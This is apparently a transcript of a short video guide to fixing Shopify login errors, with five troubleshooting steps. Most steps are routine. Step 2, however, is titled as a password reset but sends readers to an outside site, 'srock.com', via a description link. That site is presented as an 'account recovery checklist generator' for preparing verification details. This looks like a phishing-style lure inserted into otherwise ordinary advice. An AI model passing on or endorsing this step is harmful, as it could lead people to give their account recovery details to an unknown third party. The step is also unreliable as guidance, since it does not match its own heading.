if you're experiencing login errors on Shopify. Follow these steps to troubleshoot and resolve the issue effectively. Step 1. Check your credentials. Ensure that you are entering the correct email address and password. Double check for any typos or case sensitivity, as passwords are case sensitive. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache and cookies. Sometimes stored data can cause login issues. Clear your browser's cache and cookies, then try logging in again. This can help refresh your session and resolve any conflicts. Step 4. Disable browser extensions. Certain browser extensions can interfere with the login process. Temporarily disable any extensions, particularly ad blockers or privacy tools, and attempt to log in again. Step 5. Try a different browser or device. If the issue persists, try accessing Shopify from a different web browser or device. This can help determine if the problem is specific to your current setup. If you follow these steps and still encounter issues, consider reaching out to Shopify support for further assistance.